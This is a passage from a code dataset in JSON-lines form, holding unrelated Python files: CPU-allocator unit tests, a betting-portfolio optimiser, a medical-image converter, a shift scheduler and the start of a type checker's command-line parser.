cursor]\n","sub_path":"cost_tracker/cli/CLI_Window_Base.py","file_name":"CLI_Window_Base.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"547402445","text":"import logging\nimport unittest\nimport uuid\n\nfrom tests.utils import config_logs\nfrom titus_isolate.allocate.greedy_cpu_allocator import GreedyCpuAllocator\nfrom titus_isolate.allocate.integer_program_cpu_allocator import IntegerProgramCpuAllocator\nfrom titus_isolate.docker.constants import STATIC\nfrom titus_isolate.model.processor.config import get_cpu\nfrom titus_isolate.model.processor.utils import is_cpu_full, DEFAULT_TOTAL_THREAD_COUNT\nfrom titus_isolate.model.workload import Workload\n\nconfig_logs(logging.DEBUG)\n\nALLOCATORS = [IntegerProgramCpuAllocator, GreedyCpuAllocator]\n\n\nclass TestCpu(unittest.TestCase):\n\n def test_assign_one_thread_empty_cpu(self):\n \"\"\"\n Workload 0: 1 thread --> (p:0 c:0 t:0)\n \"\"\"\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n w = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT - 1, len(cpu.get_empty_threads()))\n self.assertEqual(1, len(cpu.get_claimed_threads()))\n self.assertEqual(0, cpu.get_claimed_threads()[0].get_id())\n\n def test_assign_two_threads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 2, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(2, len(cpu.get_claimed_threads()))\n\n # Expected core and 
threads\n core00 = cpu.get_packages()[0].get_cores()[0]\n core01 = cpu.get_packages()[0].get_cores()[1]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core01.get_threads()[0]\n self.assertEqual(1, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n def test_assign_two_threads_empty_cpu_greedy(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:1)\n \"\"\"\n cpu = get_cpu()\n allocator = GreedyCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 2, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(2, len(cpu.get_claimed_threads()))\n\n # Expected core and threads\n core00 = cpu.get_packages()[0].get_cores()[0]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core00.get_threads()[1]\n self.assertEqual(8, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n def test_assign_two_workloads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:0)\n Workload 1: 1 thread --> (p:1 c:0 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n self.assertEqual(3, len(cpu.get_claimed_threads()))\n\n packages = cpu.get_packages()\n\n # WORKLOAD 0\n core00 = packages[0].get_cores()[0]\n core01 = packages[0].get_cores()[1]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core01.get_threads()[0]\n self.assertEqual(1, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n # WORKLOAD 1\n core00 = packages[1].get_cores()[0]\n thread4 = core00.get_threads()[0]\n self.assertEqual(4, thread4.get_id())\n self.assertTrue(thread4.is_claimed())\n\n def test_assign_two_workloads_empty_cpu_greedy(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:0 t:1)\n Workload 1: 1 thread --> (p:1 c:0 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = GreedyCpuAllocator(cpu)\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n self.assertEqual(3, len(cpu.get_claimed_threads()))\n\n packages = cpu.get_packages()\n\n # WORKLOAD 0\n core00 = packages[0].get_cores()[0]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core00.get_threads()[1]\n self.assertEqual(8, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n # WORKLOAD 1\n core00 = packages[1].get_cores()[0]\n thread4 = core00.get_threads()[0]\n self.assertEqual(4, thread4.get_id())\n self.assertTrue(thread4.is_claimed())\n\n def test_assign_ten_threads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 10 threads --> (p:0 c:[0-7] t:[0-9])\n | 1 | 1 | 1 | 1 |\n | 1 | 1 | | |\n | ------------- |\n | 1 | 1 | 1 | 1 |\n | | | | |\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 10, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(10, len(cpu.get_claimed_threads()))\n\n expected_thread_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 12]\n\n thread_ids = [thread.get_id() for thread in cpu.get_claimed_threads()]\n thread_ids.sort()\n\n self.assertEqual(expected_thread_ids, thread_ids)\n\n def test_fill_cpu(self):\n \"\"\"\n Workload 0: 8 cores\n Workload 1: 4 cores\n Workload 2: 2 
cores\n Workload 3: 1 core\n Workload 4: 1 core\n --------------------\n Total: 16 cores\n \"\"\"\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n workloads = [\n Workload(uuid.uuid4(), 8, STATIC),\n Workload(uuid.uuid4(), 4, STATIC),\n Workload(uuid.uuid4(), 2, STATIC),\n Workload(uuid.uuid4(), 1, STATIC),\n Workload(uuid.uuid4(), 1, STATIC)]\n\n tot_req = 0\n for w in workloads:\n allocator.assign_threads(w)\n tot_req += w.get_thread_count()\n self.assertEqual(tot_req, len(cpu.get_claimed_threads()))\n\n def test_filling_holes_ip(self):\n \"\"\"\n Initialize with fragmented placement, then fill the instance. Result should be\n less fragmented, with the first workload completely filling a socket.\n | a | | a | |\n | | a | | a |\n | ------------- |\n | | a | | a |\n | a | | a | |\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n\n # Initialize fragmented workload\n wa = Workload(uuid.uuid4(), 8, STATIC)\n\n p0 = cpu.get_packages()[0]\n p0.get_cores()[0].get_threads()[0].claim(wa.get_id())\n p0.get_cores()[1].get_threads()[1].claim(wa.get_id())\n p0.get_cores()[2].get_threads()[0].claim(wa.get_id())\n p0.get_cores()[3].get_threads()[1].claim(wa.get_id())\n\n p1 = cpu.get_packages()[1]\n p1.get_cores()[0].get_threads()[1].claim(wa.get_id())\n p1.get_cores()[1].get_threads()[0].claim(wa.get_id())\n p1.get_cores()[2].get_threads()[1].claim(wa.get_id())\n p1.get_cores()[3].get_threads()[0].claim(wa.get_id())\n\n self.assertEqual(8, len(cpu.get_empty_threads()))\n\n # Fill the rest of the CPU\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 3, STATIC)\n w2 = Workload(uuid.uuid4(), 1, STATIC)\n w3 = Workload(uuid.uuid4(), 2, STATIC)\n\n workloads = [wa, w0, w1, w2, w3]\n for w in workloads:\n allocator.assign_threads(w)\n\n self.assertEqual(0, len(cpu.get_empty_threads()))\n\n # first workload should be filling completely a socket to avoid cross-socket job layout\n for package in cpu.get_packages():\n if package.get_cores()[0].get_threads()[0].get_workload_id() != wa.get_id():\n continue\n ids = [t.get_workload_id() for core in package.get_cores() for t in core.get_threads()]\n self.assertListEqual(ids, [wa.get_id()] * 8)\n\n def test_assign_to_full_cpu_fails(self):\n for allocator_class in ALLOCATORS:\n # Fill the CPU\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n w0 = Workload(uuid.uuid4(), DEFAULT_TOTAL_THREAD_COUNT, STATIC)\n allocator.assign_threads(w0)\n self.assertTrue(is_cpu_full(cpu))\n\n # Fail to claim one more thread\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n with self.assertRaises(ValueError):\n allocator.assign_threads(w1)\n\n def test_free_cpu(self):\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n w = Workload(uuid.uuid4(), 3, STATIC)\n allocator.assign_threads(w)\n self.assertEqual(\n DEFAULT_TOTAL_THREAD_COUNT - w.get_thread_count(),\n len(cpu.get_empty_threads()))\n\n allocator.free_threads(w.get_id())\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n def test_free_cpu_3_workloads(self):\n # Add 3 workloads sequentially, and then remove the 2nd one added.\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n\n w0 = Workload(123, 3, STATIC)\n w1 = Workload(456, 2, STATIC)\n w2 = Workload(789, 4, STATIC)\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n 
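# assign the third workload; the middle one (w1) is freed below\n            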
allocator.assign_threads(w2)\n self.assertEqual(3 + 4 + 2, len(cpu.get_claimed_threads()))\n\n allocator.free_threads(w1.get_id())\n self.assertEqual(3 + 4, len(cpu.get_claimed_threads()))\n\n workload_ids_left = set()\n for t in cpu.get_threads():\n if t.is_claimed():\n workload_ids_left.add(t.get_workload_id())\n\n self.assertListEqual(sorted(list(workload_ids_left)), [123, 789])\n\n def test_cache_ip(self):\n \"\"\"\n [add a=2, add b=2, remove b=2, add c=2, remove a=2, add d=2] should lead to the following cache entries:\n (state=[], req=[2])\n (state=[2], req=[2,2])\n (state=[2,2], req=[2,0])\n [cache hit]\n [cache hit]\n (state=[2,2], req=[2,2]) but different layout\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n\n allocator.assign_threads(Workload(\"a\", 2, STATIC))\n self.assertEqual(1, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"b\", 2, STATIC))\n self.assertEqual(2, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.free_threads(\"b\")\n self.assertEqual(3, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"c\", 2, STATIC))\n self.assertEqual(3, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.free_threads(\"a\")\n self.assertEqual(4, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"d\", 2, STATIC))\n self.assertEqual(5, len(allocator._IntegerProgramCpuAllocator__cache))","sub_path":"tests/allocate/test_allocate.py","file_name":"test_allocate.py","file_ext":"py","file_size_in_byte":11741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"412856980","text":"from itertools import permutations, combinations\nimport numpy as np\nfrom torch import nn\nimport torch\nimport torch.nn.functional as F\nfrom matplotlib import pyplot as plt\n\n\nclass Portfolio:\n\n def __init__(self, h, odds=None, single=True, place=True, double=True, place_q=True):\n size = 0\n if single:\n size += h\n if place:\n size += h\n if double:\n size += h*(h-1)/2\n if place_q:\n size += h*(h-1)/2\n\n self.single = single\n self.place = place\n self.double = double\n self.place_q = place_q\n\n w = np.random.normal(loc=1, scale=0.2, size=[1, int(size)])\n self.weights = torch.tensor(w, dtype=torch.float32, requires_grad=True)\n self.optim = torch.optim.SGD([self.weights], lr=0.0001, momentum=0.2)\n self.horse = [str(i + 1) for i in range(h)]\n self.horse_combination = [c for c in combinations(self.horse, 2)]\n self.odds = odds\n\n def forward(self, outcomes, prob):\n amount = F.relu(self.weights.sum())\n r = outcomes * prob\n r = r * self.weights\n r = r.sum(dim=1) - amount\n return -r.sum()\n\n def plot(self):\n\n pays = [self._return(r) for r in permutations(self.horse, 3)]\n pays = np.stack(pays, axis=0)\n pays = torch.tensor(pays)\n\n w = F.relu(self.weights).detach()\n invest = float(w.sum())\n print('Total Investment: ', invest)\n w = pays * w\n w = w.sum(dim=1)\n w = w.numpy()\n print('Average return = ', np.mean(w) / invest)\n losses = 0\n for i in w:\n if i < invest:\n losses += 1\n print('Loss Probability = ', losses/len(w))\n plt.hist(w, bins='auto')\n plt.axvline(x=invest, color='Red')\n plt.show()\n\n def optimize(self, prob=None):\n\n pays = [self._return(r) for r in permutations(self.horse, 3)]\n no_outcomes = len(pays)\n pays = np.stack(pays, axis=0)\n pays = torch.tensor(pays)\n\n if prob is None:\n prob = torch.ones(no_outcomes, dtype=torch.float)\n\n for i in 
range(300):\n self.optim.zero_grad()\n loss = self.forward(pays, prob)\n loss.backward()\n self.optim.step()\n\n def profit(self, winner):\n r = self._return(winner)\n r = r.view([-1, 1])\n p = torch.matmul(F.relu(self.weights), r)\n return float(p)\n\n @property\n def amount(self):\n a = F.relu(self.weights).sum()\n return float(a)\n\n def _return(self, winner):\n\n r = []\n i = 0\n\n if self.single:\n for s in self.horse:\n if s == winner[0]:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.place:\n for p in self.horse:\n if p == winner[0] or p == winner[1] or p == winner[2]:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.double:\n for d in self.horse_combination:\n if winner[0] in d and winner[1] in d:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.place_q:\n for pq in self.horse_combination:\n if pq[0] in winner and pq[1] in winner:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n return torch.tensor(r)\n\n\nclass Odds:\n\n def __init__(self, odd_dict):\n self.odd = odd_dict\n self.no_horse = len(odd_dict['win+place'])-1\n self.numbers = [str(i + 1) for i in range(self.no_horse)]\n\n @staticmethod\n def locate_odds(df, h1, h2=None, option=None):\n\n if h2 is None:\n h1 = int(h1)\n if option == 'win':\n y = h1\n x = 4\n else:\n y = h1\n x = 5\n else:\n h1 = int(h1)\n h2 = int(h2)\n if h1 > h2:\n tmp = h1\n h1 = h2\n h2 = tmp\n if h1 < 8:\n y = h1\n x = h2 + 1\n else:\n y = h2 - 7\n x = h1 - 7\n return float(df.loc[y, x])\n\n @staticmethod\n def random_odds(h, factor=0.82, single=True, place=True, double=True, place_q=True):\n\n odds = []\n\n if single:\n mean = h * factor\n single_odd = np.random.normal(loc=mean, scale=h / 2, size=h)\n single_odd = np.abs(single_odd)\n odds.extend(single_odd.tolist())\n\n if place:\n mean = h / 3 * factor\n place_odd = np.random.normal(loc=mean, scale=h / 3, size=h)\n single_odd = np.abs(place_odd)\n odds.extend(place_odd.tolist())\n\n if double:\n mean = h * (h - 1) / 2 * factor\n double_odd = np.random.normal(loc=mean, scale=2 * h, size=int(h * (h - 1) / 2))\n double_odd = np.abs(double_odd)\n odds.extend(double_odd.tolist())\n\n if place_q:\n mean = h * (h - 1) / 6 * factor\n pq_odd = np.random.normal(loc=mean, scale=h, size=int(h * (h - 1) / 2))\n pq_odd = np.abs(pq_odd)\n odds.extend(pq_odd.tolist())\n\n return odds\n\n def to_list(self, single=True, place=True, double=True, place_q=True):\n\n odds = []\n\n if single:\n for h in self.numbers:\n odd = self.locate_odds(self.odd['win+place'], h, option='win')\n odds.append(odd)\n\n if place:\n for h in self.numbers:\n odd = self.locate_odds(self.odd['win+place'], h, option='place')\n odds.append(odd)\n\n if double:\n for h in combinations(self.numbers, 2):\n odd = self.locate_odds(self.odd['quinella'], *h)\n odds.append(odd)\n\n if place_q:\n for h in combinations(self.numbers, 2):\n odd = self.locate_odds(self.odd['quinella_p'], *h)\n odds.append(odd)\n\n return odds\n\n\nimport pickle as pk\nf = open('./Data/Odds/20190714_odd.dfdl', 'rb')\nod = pk.load(f)\nf.close()\nodd = Odds(od[0])\no = odd.to_list()\nport = Portfolio(14, o)\nport.optimize()\n\nport.plot()\np = port.profit(['6', '1', '4'])\nprint(p)\n\n\n\n\n","sub_path":"protfolio.py","file_name":"protfolio.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"204601921","text":"# First, install below packages\r\n# pip install scipy\r\n#\r\n# pip install shutil\r\n#\r\n# pip 
install os\r\n#\r\n# pip install nibabel\r\n#\r\n# pip install numpy\r\n\r\n\r\nimport os\r\nimport numpy as np\r\nfrom nibabel.testing import data_path\r\nimport nibabel as nib\r\nimport matplotlib.pylab as plt\r\nimport time\r\n\r\n\r\ndef nii2png(nii_directory):\r\n example_filename = os.path.join(data_path, nii_directory)\r\n img = nib.load(example_filename)\r\n data = np.array(img.get_fdata())\r\n data = np.moveaxis(data, -1, 0)\r\n print(\"shape:\", data.shape)\r\n return data\r\n\r\n\r\ndef draw(images, name, columns=4):\r\n rows = int(np.ceil(images.shape[0] / columns))\r\n max_size = 20\r\n\r\n width = min(columns * 5, max_size)\r\n height = width * rows // columns\r\n\r\n plt.figure(figsize=(width, height))\r\n plt.gray()\r\n plt.subplots_adjust(0, 0, 1, 1, 0.01, 0.01)\r\n for i in range(images.shape[0]):\r\n plt.subplot(rows, columns, i + 1), plt.imshow(images[i]), plt.axis('off')\r\n plt.savefig(name)\r\n print(\"file saved at\", name)\r\n plt.close()\r\n\r\n\r\ndir = input(\"Enter the .nii file path: e.g. C:/Users/Name/nii2png/file.nii \\n\")\r\nout_dir = input(\"Enter the output path: e.g. C:/Users/Name/nii2png/output.png \\n\")\r\nstart_time = time.time()\r\ndata = nii2png(dir)\r\ndraw(data, out_dir)\r\nprint(f'Conversion is done in {time.time() - start_time} secs.')\r\n","sub_path":"nii2png.py","file_name":"nii2png.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"647098817","text":"import csv\nimport os.path\nimport numpy as np\nimport pandas as pd\nfrom numpy import number\n\nfrom . import database, utils\nfrom shutil import copyfile\nfrom ortools.sat.python import cp_model\n\n###################### creat shifts ########################\n# insert to matrix all workers that applied shifts\ndef pre_condition_for_creating_shifts(a, b, c):\n shifts = np.zeros((a, b, c), dtype=int)\n current_week = str(utils.get_sunday_date(1))\n workers_names = []\n w = 0\n d = 0\n s = 0\n for worker in utils.WORKER_LIST:\n if not database.database.child('worker_preference').child(worker).child(current_week).child('1_sunday').child('1_morning').get().val() == None:\n workers_names.append(worker)\n for day in utils.DAYS:\n for shift in utils.SHIFTS:\n shifts[w][d][s] = int(database.database.child('worker_preference').child(worker).child(current_week).child(day).child(shift).get().val())\n if s == 2:\n d = d + 1\n s = 0\n else:\n s = s + 1\n d = 0\n s = 0\n w = w + 1\n return shifts, workers_names\n\ndef post_condition_for_creating_shifts(final_shifts):\n current_week = str(utils.get_sunday_date(1))\n i = 0\n for s in utils.SHIFTS:\n for d in utils.DAYS:\n database.database.child('board').child(current_week).child(d).child(s).set(final_shifts[i])\n i = i + 1\n\n\ndef create_shifts():\n num_workers = 0\n for user in database.database.child('worker_preference').get():\n for week in user.val():\n if week == str(utils.get_sunday_date(1)):\n num_workers = num_workers + 1\n if num_workers == 0 :\n return \"No one applied to any shifts\"\n num_days = 7\n num_shifts = 3\n all_workers = range(num_workers)\n all_shifts = range(num_shifts)\n all_days = range(num_days)\n shift_requests, workers_names = pre_condition_for_creating_shifts(num_workers,num_days,num_shifts)\n # Creates the model.\n model = cp_model.CpModel()\n\n # Creates shift variables.\n # shifts[(n, d, s)]: worker 'n' works shift 's' on day 'd'.\n shifts = {}\n for n in all_workers:\n for d in all_days:\n for s in all_shifts:\n shifts[(n, d,\n 
s)] = model.NewBoolVar('shift_n%id%is%i' % (n, d, s))\n\n # Each shift is assigned to exactly one worker in.\n for d in all_days:\n for s in all_shifts:\n model.Add(sum(shifts[(n, d, s)] for n in all_workers) == 1)\n\n # Each worker works at most one shift per day.\n for n in all_workers:\n for d in all_days:\n model.Add(sum(shifts[(n, d, s)] for s in all_shifts) <= 1)\n\n # Try to distribute the shifts evenly, so that each worker works\n # min_shifts_per_worker shifts. If this is not possible, because the total\n # number of shifts is not divisible by the number of workers, some workers will\n # be assigned one more shift.\n min_shifts_per_worker = (num_shifts * num_days) // num_workers\n if num_shifts * num_days % num_workers == 0:\n max_shifts_per_worker = min_shifts_per_worker\n else:\n max_shifts_per_worker = min_shifts_per_worker + 1\n for n in all_workers:\n num_shifts_worked = 0\n for d in all_days:\n for s in all_shifts:\n num_shifts_worked += shifts[(n, d, s)]\n model.Add(min_shifts_per_worker <= num_shifts_worked)\n model.Add(num_shifts_worked <= max_shifts_per_worker)\n\n final_shifts = []\n id = []\n # pylint: disable=g-complex-comprehension\n model.Maximize(sum(shift_requests[n][d][s] * shifts[(n, d, s)] for n in all_workers for d in all_days for s in all_shifts))\n # Creates the solver and solve.\n solver = cp_model.CpSolver()\n solver.Solve(model)\n for s in all_shifts:\n for d in all_days:\n print('Day', d)\n for n in all_workers:\n if solver.Value(shifts[(n, d, s)]) == 1:\n if shift_requests[n][d][s] == 1:\n final_shifts.append(workers_names[n])\n print('Worker', workers_names[n], 'works shift', s, '(requested).')\n else:\n final_shifts.append(workers_names[n] + \" suggestion\")\n print('Worker', workers_names[n], 'works shift', s, '(not requested).')\n print()\n post_condition_for_creating_shifts(final_shifts)\n\n # Statistics.\n print()\n print('Statistics')\n print(' - Number of shift requests met = %i' % solver.ObjectiveValue(),\n '(out of', num_workers * min_shifts_per_worker, ')')\n print(' - wall time : %f s' % solver.WallTime())\n\n return \"Done\"","sub_path":"Shifts/create_shifts_algo.py","file_name":"create_shifts_algo.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"419123578","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport argparse\nimport logging\nimport os\nimport shutil\nimport sys\nimport time\nimport traceback\nfrom typing import Type # noqa\n\nfrom . 
import (\n assert_writable_directory,\n buck,\n commands,\n find_log_directory,\n get_binary_version_from_file,\n is_capable_terminal,\n log,\n log_statistics,\n readable_directory,\n switch_root,\n translate_arguments,\n)\nfrom .analysis_directory import AnalysisDirectory, resolve_analysis_directory\nfrom .commands import ( # noqa\n Command,\n ExitCode,\n IncrementalStyle,\n ProfileOutput,\n reporting,\n)\nfrom .configuration import Configuration\nfrom .exceptions import EnvironmentException\nfrom .version import __version__\n\n\nLOG = logging.getLogger(__name__) # type: logging.Logger\n\n\ndef main() -> int:\n def executable_file(file_path: str) -> str:\n if not os.path.isfile(file_path):\n raise EnvironmentException(\"%s is not a valid file\" % file_path)\n if not os.access(file_path, os.X_OK):\n raise EnvironmentException(\"%s is not an executable file\" % file_path)\n return file_path\n\n def writable_directory(path: str) -> str:\n # Create the directory if it does not exist.\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n assert_writable_directory(path)\n return path\n\n def file_exists(path: str) -> str:\n if not os.path.exists(path):\n raise argparse.ArgumentTypeError(\"ERROR: \" + str(path) + \" does not exist\")\n return path\n\n parser = argparse.ArgumentParser(\n allow_abbrev=False,\n formatter_class=argparse.RawTextHelpFormatter,\n epilog=\"environment variables:\"\n \"\\n `PYRE_BINARY` overrides the pyre binary used.\"\n \"\\n `PYRE_VERSION_HASH` overrides the pyre version set in the \"\n \"configuration files.\",\n )\n\n parser.add_argument(\n \"-l\", \"--local-configuration\", type=str, help=\"Use a local configuration\"\n )\n\n parser.add_argument(\n \"--version\",\n action=\"store_true\",\n help=\"Print the client and binary versions of Pyre.\",\n )\n\n parser.add_argument(\"--debug\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--sequential\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--strict\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--additional-check\", action=\"append\", help=argparse.SUPPRESS)\n\n parser.add_argument(\n \"--show-error-traces\",\n action=\"store_true\",\n help=\"Display errors trace information\",\n )\n\n # Logging.\n parser.add_argument(\n \"--output\",\n choices=[commands.reporting.TEXT, commands.reporting.JSON],\n default=commands.reporting.TEXT,\n help=\"How to format output\",\n )\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"Enable verbose logging\")\n parser.add_argument(\n \"--enable-profiling\", action=\"store_true\", help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--enable-memory-profiling\", action=\"store_true\", help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"-n\",\n \"--noninteractive\",\n action=\"store_true\",\n help=\"Disable interactive logging\",\n )\n parser.add_argument(\n \"--hide-parse-errors\",\n action=\"store_true\",\n help=\"Hide detailed information about parse errors\",\n )\n parser.add_argument(\n \"--show-parse-errors\",\n action=\"store_true\",\n help=\"[DEPRECATED] Show detailed information about parse errors\",\n )\n parser.add_argument(\n \"--logging-sections\", help=argparse.SUPPRESS # Enable sectional logging.\n )\n parser.add_argument(\n \"--log-identifier\",\n default=\"\",\n help=argparse.SUPPRESS, # Add given identifier to logged samples.\n )\n parser.add_argument(\n \"--log-directory\", help=argparse.SUPPRESS # Override default location for logs\n )\n parser.add_argument(\n 
\"--logger\", help=argparse.SUPPRESS # Specify custom logging binary.\n )\n parser.add_argument(\"--formatter\", help=argparse.SUPPRESS)\n\n # Link tree determination.\n buck_arguments = parser.add_argument_group(\"buck\")\n buck_arguments.add_argument(\n \"--target\", action=\"append\", dest=\"targets\", help=\"The buck target to check\"\n )\n buck_arguments.add_argument(\n \"--build\",\n action=\"store_true\",\n help=\"Freshly build all the necessary artifacts.\",\n )\n buck_arguments.add_argument(\n \"--use-buck-builder\",\n action=\"store_true\",\n help=\"Use Pyre's experimental builder for Buck projects.\",\n )\n buck_arguments.add_argument(\n \"--use-legacy-builder\",\n action=\"store_true\",\n help=\"Use Pyre's legacy builder for Buck projects.\",\n )\n buck_arguments.add_argument(\n \"--buck-builder-debug\", action=\"store_true\", help=argparse.SUPPRESS\n )\n\n source_directories = parser.add_argument_group(\"source-directories\")\n source_directories.add_argument(\n \"--source-directory\",\n action=\"append\",\n dest=\"source_directories\",\n help=\"The source directory to check\",\n type=os.path.abspath,\n )\n source_directories.add_argument(\n \"--filter-directory\", help=argparse.SUPPRESS # override filter directory\n )\n\n parser.add_argument(\n \"--use-global-shared-analysis-directory\",\n action=\"store_true\",\n help=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--no-saved-state\",\n action=\"store_true\",\n help=\"Don't attempt to load Pyre from a saved state.\",\n )\n\n # Handling of search path\n parser.add_argument(\n \"--search-path\",\n action=\"append\",\n default=[],\n type=readable_directory,\n help=\"Add an additional directory of modules and stubs to include\"\n \" in the type environment\",\n )\n parser.add_argument(\n \"--preserve-pythonpath\",\n action=\"store_true\",\n default=False,\n help=\"Preserve the value of the PYTHONPATH environment variable and \"\n \"inherit the current python environment's search path\",\n )\n\n parser.add_argument(\n \"--binary\",\n default=None,\n type=executable_file,\n help=\"Location of the pyre binary\",\n )\n\n parser.add_argument(\n \"--buck-builder-binary\",\n default=None,\n help=\"Location of the buck builder binary\",\n )\n parser.add_argument(\"--buck-builder-target\", default=None, help=argparse.SUPPRESS)\n\n parser.add_argument(\n \"--exclude\",\n action=\"append\",\n default=[],\n help=\"Exclude files and directories matching this regexp from parsing\",\n )\n\n # Typeshed stubs location\n parser.add_argument(\n \"--typeshed\",\n default=None,\n type=readable_directory,\n help=\"Location of the typeshed stubs\",\n )\n parser.add_argument(\n \"--save-initial-state-to\",\n default=None,\n help=\"Path to serialize pyre's initial state to.\",\n )\n parser.add_argument(\n \"--load-initial-state-from\", default=None, type=str, help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--changed-files-path\", default=None, type=str, help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--saved-state-project\", default=None, type=str, help=argparse.SUPPRESS\n )\n # Temporary flag to help migrate to json sockets for incremental and query commands.\n parser.add_argument(\n \"--use-json-sockets\", action=\"store_true\", default=False, help=argparse.SUPPRESS\n )\n # Subcommands.\n parsed_commands = parser.add_subparsers(\n metavar=\"{analyze, check, color, kill, incremental, initialize (init), \"\n \"query, rage, restart, statistics, start, stop}\",\n help=\"\"\"\n The pyre command to run; defaults to `incremental`.\n Run `pyre 
command --help` for documentation on a specific command.\n \"\"\",\n )\n\n incremental_help = \"\"\"\n Connects to a running Pyre server and returns the current type errors for your\n project. If no server exists for your projects, starts a new one. Running `pyre`\n implicitly runs `pyre incremental`.\n\n By default, incremental checks ensure that all dependencies of changed files are\n analyzed before returning results. If you'd like to get partial type checking\n results eagerly, you can run `pyre incremental --nonblocking`.\n \"\"\"\n incremental = parsed_commands.add_parser(\n commands.Incremental.NAME, epilog=incremental_help\n )\n incremental.set_defaults(command=commands.Incremental)\n incremental.add_argument(\n \"--nonblocking\",\n action=\"store_true\",\n help=(\n \"Ask the server to return partial results immediately, \"\n \"even if analysis is still in progress.\"\n ),\n )\n incremental.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n rage = parsed_commands.add_parser(\n commands.Rage.NAME,\n epilog=\"\"\"\n 